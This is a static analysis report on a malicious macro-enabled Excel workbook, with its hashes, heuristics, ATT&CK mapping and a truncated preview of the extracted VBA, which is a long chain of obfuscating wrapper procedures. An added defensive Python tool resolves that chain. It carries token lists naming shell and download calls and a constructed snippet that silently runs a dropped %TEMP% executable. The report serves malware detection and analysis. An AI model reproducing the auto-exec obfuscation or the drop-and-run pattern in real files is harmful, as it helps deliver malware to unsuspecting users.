Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0ebfbcbf8c35ff8c…

MALICIOUS

Office (OLE)

Size: 96.0 KB
Created: 2018-02-12 19:41:34
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: 73828f9d183d9d9004591767ef21da13
SHA-1: 8ab7fa25e9c8ec1b5cfc275da5592c6068c214fc
SHA-256: 0ebfbcbf8c35ff8cbf36e38799b5129c7b70c6895d5f11d1ab562a511a2ec76e
Risk score: 228

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an Excel workbook whose VBA project defines a Workbook_Open handler, spelled workBOok_oPeN in the source; VBA identifiers are case-insensitive, so it still runs automatically when the workbook is opened with macros enabled. The extracted source is obfuscated by control-flow indirection: the handler calls a long chain of randomly named, single-statement wrapper procedures (yedhu calls fzfwx, which calls tento, and so on), each doing nothing but call the next, which inflates the module and separates the auto-exec entry point from the statements that do the work. The heuristics flag Shell() and Environ() calls further down the module, beyond the truncated preview: Shell() launches an external process, and Environ() is typically used to resolve a writable path such as %TEMP% or %APPDATA%. Together they are consistent with dropping and executing a second-stage payload, although the download or drop mechanism itself is not visible in the preview. The ClamAV signature Xls.Malware.Valyria-10036513-0 corroborates the verdict. None of the findings evidence an exploit; execution depends on the user enabling macros.

Heuristics (6)

  • ClamAV: Xls.Malware.Valyria-10036513-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA code calls Shell(), which launches an external process.
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    A Workbook_Open handler runs automatically when the workbook is opened with macros enabled (spelled workBOok_oPeN in this sample; VBA is case-insensitive).
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule catches p-code-only documents, and documents whose source extraction fails, where no readable source is available.
  • Environ() call (environment variable access) [low] OLE_VBA_ENVIRON
    The VBA code calls Environ(), which reads environment variables; macros commonly use it to resolve a writable drop path such as %TEMP% or %APPDATA%.
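The summary above and the OLE_VBA_WBOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC findings describe one pattern: an auto-execution entry point, execution tokens such as Shell() and Environ(), and a chain of single-call wrapper procedures between them. The Python below is an added example, not part of this report, of oletools or of ClamAV. Given decoded VBA source (for instance the carved macros.bas), it finds the auto-exec entry point, walks the Call chain through the wrappers and reports the first procedure containing a shell, download or object-creation token, so an analyst can reach the sink without reading the whole module. The sample macro is constructed: its first procedures copy the naming style of the extracted source (workBOok_oPeN, yedhu), while the terminal procedure final_stage and its Environ()/Shell() statements are invented for illustration, since the report's preview is truncated before the real sink.

```python
"""Walk an obfuscated VBA auto-exec call chain to its execution sink.
Added illustrative example; not part of the report, oletools or ClamAV."""
import re

# Auto-exec entry points (VBA names are case-insensitive: "workBOok_oPeN" still fires).
AUTOEXEC_NAMES = {"workbook_open", "workbook_activate", "auto_open", "autoopen",
                  "document_open", "auto_close", "autoclose", "document_close"}
# Tokens for process launch, download or COM object creation.
EXEC_TOKENS = {"shell", "wscript.shell", "createobject", "getobject",
               "urldownloadtofile", "environ", "powershell"}
PROC_RE = re.compile(r"^(?:(?:private|public|static|friend)\s+)*(?:sub|function)"
                     r"\s+([A-Za-z_]\w*)\s*\(", re.IGNORECASE)
END_RE = re.compile(r"^end\s+(?:sub|function)\b", re.IGNORECASE)
CALL_RE = re.compile(r"^call\s+([A-Za-z_]\w*)\b", re.IGNORECASE)

def split_statements(line: str) -> list:
    """Split a line on ':' separators, honouring "..." strings; drop ' comments."""
    parts, buf, in_str = [], [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            break
        if ch == ":" and not in_str:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]

def parse_procedures(source: str) -> dict:
    """Map lower-cased procedure name -> list of its body statements."""
    procs, current = {}, None
    for line in source.splitlines():
        for stmt in split_statements(line):
            m = PROC_RE.match(stmt)
            if m:
                current = m.group(1).lower()
                procs[current] = []
            elif END_RE.match(stmt):
                current = None
            elif current is not None:
                procs[current].append(stmt)
    return procs

def exec_tokens_in(stmt: str) -> list:
    """Whole-word, case-insensitive execution tokens found in one statement."""
    return sorted(t for t in EXEC_TOKENS
                  if re.search(r"(?<!\w)" + re.escape(t) + r"(?!\w)", stmt.lower()))

def resolve_chain(procs: dict, entry: str, max_depth: int = 1000) -> tuple:
    """Follow single-call wrappers from `entry` to the first procedure holding an
    execution token; stop when the chain ends, loops or exceeds max_depth."""
    chain, seen = [entry], {entry}
    while len(chain) <= max_depth:
        body = procs.get(chain[-1], [])
        hits = [(s, toks) for s in body if (toks := exec_tokens_in(s))]
        if hits:
            return chain, hits
        nxt = None
        for stmt in body:                     # "Call x" or a bare "x" statement
            m = CALL_RE.match(stmt)
            name = m.group(1).lower() if m else stmt.lower()
            if name in procs:
                nxt = name
                break
        if nxt is None or nxt in seen:
            return chain, []
        seen.add(nxt)
        chain.append(nxt)
    return chain, []

def analyze(source: str) -> dict:
    """Per auto-exec entry point: wrapper chain, depth, sink procedure, tokens."""
    procs, report = parse_procedures(source), {}
    for entry in sorted(n for n in procs if n in AUTOEXEC_NAMES):
        chain, hits = resolve_chain(procs, entry)
        report[entry] = {"chain": chain, "depth": len(chain) - 1,
                         "sink": chain[-1] if hits else None,
                         "tokens": sorted({t for _, ts in hits for t in ts}),
                         "statements": [s for s, _ in hits]}
    return report

# Constructed sample: wrapper style copied from the extracted macro; the final
# stage is invented, since the report's preview is truncated before it.
SAMPLE_VBA = r'''
Static Sub workBOok_oPeN(): Call yedhu: End Sub
Function yedhu() As Date
Call final_stage
End Function
Static Sub final_stage()
    p = Environ("TEMP") & "\stage2.exe"   ' hypothetical drop path
    Shell p, vbHide
End Sub
'''

if __name__ == "__main__":
    print(analyze(SAMPLE_VBA))
```

On the constructed sample this reports workbook_open reaching final_stage at depth 2 with tokens environ and shell. The walk takes, in each procedure, the first statement that names another procedure, so junk statements interleaved by an obfuscator do not break it, but a chain that passes through GoTo, late-bound calls or a CallByName string will stop early and report no sink; the token list is deliberately small and should be extended per case. Rem-style comments are not stripped, only ' comments are.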

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   21295 bytes
SHA-256: 00388ed83bd16984c9a65ae9b925805080c0f491319a92c2a9913381cfb2616b

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub workBOok_oPeN(): Call yedhu: End Sub
Function yedhu() As Date
Call fzfwx
End Function
Function fzfwx() As Variant
Call tento
End Function
Sub tento()
Call bzpir
End Sub
Static Sub bzpir()
Call pfxfj
End Sub
Static Function pfxfj() As Currency
Call wazum
End Function
Static Function wazum() As Object
Call lghrd
End Function
Static Sub lghrd()
Call sbkgg
End Sub
Function sbkgg() As Object
Call ggrdy
End Function
Function ggrdy() As Long
Call umyap
End Function
Sub umyap()
Call chbps
End Sub
Private Function chbps() As Long
Call qnimk
End Function
Private Function qnimk() As Date
Call xilan
End Function
Private Sub xilan()
Call lnsxe
End Sub
Private Sub lnsxe()
Call tivmh
End Sub
Private Function tivmh()
Call hocjz
End Function
Function hocjz() As Double
Call ojfyb
End Function
Sub ojfyb()
Call dpmvt
End Sub
Sub dpmvt()
Call kkpkw
End Sub
Function kkpkw() As Date
Call ypwho
End Function
Sub ypwho()
Call fkzwq
End Sub
Sub fkzwq()
Call uqgti
End Sub
Private Function uqgti() As Variant
Call bljil
End Function
Private Sub bljil()
Call igmxn
End Sub
Private Sub igmxn()
Call xmtuf
End Sub
Private Function xmtuf() As Double
Call ehwji
End Function
Private Function ehwji() As Single
Call smdga
End Function
Sub smdga()
Call zhguc
End Sub
Sub zhguc()
Call onnru
End Sub
Function onnru() As Integer
Call viqgx
End Function
Function viqgx() As Currency
Call joxdo
End Function
Sub joxdo()
Call rjasr
End Sub
Sub rjasr()
Call fohpj
End Sub
Private Function fohpj() As Object
Call mjkem
End Function
Private Sub mjkem()
Call aprbd
End Sub
Private Sub aprbd()
Call ikuqg
End Sub
Private Function ikuqg() As String
Call wqbny
End Function
Private Function wqbny() As Boolean
Call dleca
End Function
Sub dleca()
Call rqlzs
End Sub
Sub rqlzs()
Call zloov
End Sub
Function zloov() As Object
Call xehns
End Function
Static Sub xehns()
Call edsvn
End Sub
Static Function edsvn() As Object
Call snhlx
End Function
Private Function snhlx() As Byte
Call ymstt
End Function
Private Sub ymstt()
Call fldco
End Sub
Static Sub fldco()
Call mkokj
End Sub
Static Function mkokj() As Boolean
Call sjzsf
End Function
Private Sub sjzsf()
Call zikaa
End Sub
Private Function zikaa()
Call ghviv
End Function
Private Sub ghviv()
Call mggqr
End Sub
Static Sub mggqr()
Call tfrzm
End Sub
Static Function tfrzm() As Integer
Call aechi
End Function
Private Sub aechi()
Call gdnpd
End Sub
Private Sub gdnpd()
Call uncfn
End Sub
Static Function uncfn() As String
Call bmnnj
End Function
Static Function bmnnj() As Single
Call hlywe
End Function
Static Sub hlywe()
Call okjez
End Sub
Private Function okjez() As Variant
Call vjumv
End Function
Private Sub vjumv()
Call bifuq
End Sub
Static Sub bifuq()
Call ihqcl
End Sub
Static Function ihqcl() As String
Call pgbkh
End Function
Private Sub pgbkh()
Call vfmtc
End Sub
Private Function vfmtc() As Byte
Call cexbx
End Function
Static Function cexbx() As Double
Call jdijt
End Function
Static Sub jdijt()
Call wmxzd
End Sub
Static Sub wmxzd()
Call dlihy
End Sub
Private Function dlihy() As Long
Call jktqu
End Function
Private Sub jktqu()
Call qjeyp
End Sub
Static Sub qjeyp()
Call xipgk
End Sub
Static Function xipgk() As Currency
Call dhaog
End Function
Private Sub dhaog()
Call kglwb
End Sub
Private Function kglwb() As Date
Ca
... (truncated)